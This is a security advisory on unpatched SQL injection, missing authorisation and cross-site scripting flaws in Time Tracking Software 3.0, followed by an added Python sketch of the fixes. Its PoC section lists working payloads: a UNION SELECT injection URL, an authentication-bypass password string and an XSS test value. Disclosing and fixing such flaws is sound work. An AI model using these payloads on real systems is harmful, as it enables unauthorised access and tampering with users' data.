Multiple Vulnerabilities in Time Tracking Software

Summary

Vulnerability
Multiple Vulnerabilities in Time Tracking Software
Discovered
2006.02.08
Last Update
2006.02.18 Exploitation code published
ID
EV0069
CVE
CVE-2006-0689 CVE-2006-0690 CVE-2006-0691
Risk Level
medium
Type
Multiple Vulnerabilities
Status
Unpatched. No reply from developer(s)
Vendor
TTS Software
Vulnerable Software
Time Tracking Software (http://schedulingmanagement.com/download-time-tracking-software-now.php)
Version
3.0
PoC/Exploit
Available
Solution
Not available
Discovered by
Aliaksandr Hartsuyeu (eVuln.com)

Description

Multiple vulnerabilities were found in the Time Tracking Software (http://schedulingmanagement.com/download-time-tracking-software-now.php) script.

1. Unauthorized data modification is possible.

The edituser.php script does not check the user name and password, allowing the data of any user to be modified.


2. Multiple SQL Injections

Most user-supplied data is not properly sanitized. This can be used to bypass authentication or to execute arbitrary SQL queries by injecting SQL code.


3. Cross-Site Scripting

The UserName value in the registration form is not properly sanitized. This can be used to insert arbitrary HTML or JavaScript code.

PoC/Exploit

1. Unauthorized data modifications.

http://host/timetracking/edituser.php?num=[userid]


2a. SQL Injection Example

http://host/timetracking/edituser.php?num=999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13/*


2b. Authentication Bypass Example

Url: http://host/timetracking/login.php
Name: any
Password: ' union select 1,2,3,4,5,6,7,8,9,10,11,12,13/*


3. Cross-Site Scripting Example

Url: http://host/timetracking/register.php
User Name: <XSS>

Solution

A solution for "Multiple Vulnerabilities in Time Tracking Software" is not available. Check the TTS Software website for updates.
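Since no vendor fix exists, the following is an added example (not the vendor's code, and written in Python rather than the application's PHP) modelling the three checks the script lacks: a parameterised login query, an integer-and-ownership check on the num parameter of edituser.php, and output escaping of the registration UserName. The users table, accounts and plaintext passwords are constructed stand-ins, not the real schema.

```python
import html
import re
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the application's user table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, "
               "password TEXT, email TEXT)")
    # Plaintext passwords only to keep the example short; real code stores
    # a salted hash and compares against it.
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "alice", "alice-secret", "alice@example.test"),
        (2, "bob", "bob-secret", "bob@example.test"),
    ])
    return db


def login(db, name, password):
    """login.php equivalent. The values are bound as parameters, so the
    quote and UNION in the advisory's 2b payload stay inside the literal
    and simply match no row (addresses finding 2)."""
    row = db.execute("SELECT id FROM users WHERE name = ? AND password = ?",
                     (name, password)).fetchone()
    return row[0] if row else None


def edit_user(db, session_user_id, num, new_email):
    """edituser.php equivalent. num must be a bare decimal integer, which
    rejects the 2a payload, and must equal the logged-in user's own id,
    which closes the missing authorisation check (finding 1)."""
    if session_user_id is None:
        return "denied: not logged in"
    if not re.fullmatch(r"[0-9]+", num):
        return "denied: invalid num"
    if int(num) != session_user_id:
        return "denied: not your record"
    db.execute("UPDATE users SET email = ? WHERE id = ?",
               (new_email, int(num)))
    return "ok"


def render_username(name):
    """Escape the registration UserName before echoing it into HTML, so a
    value like <XSS> is shown as text, not markup (finding 3)."""
    return html.escape(name, quote=True)
```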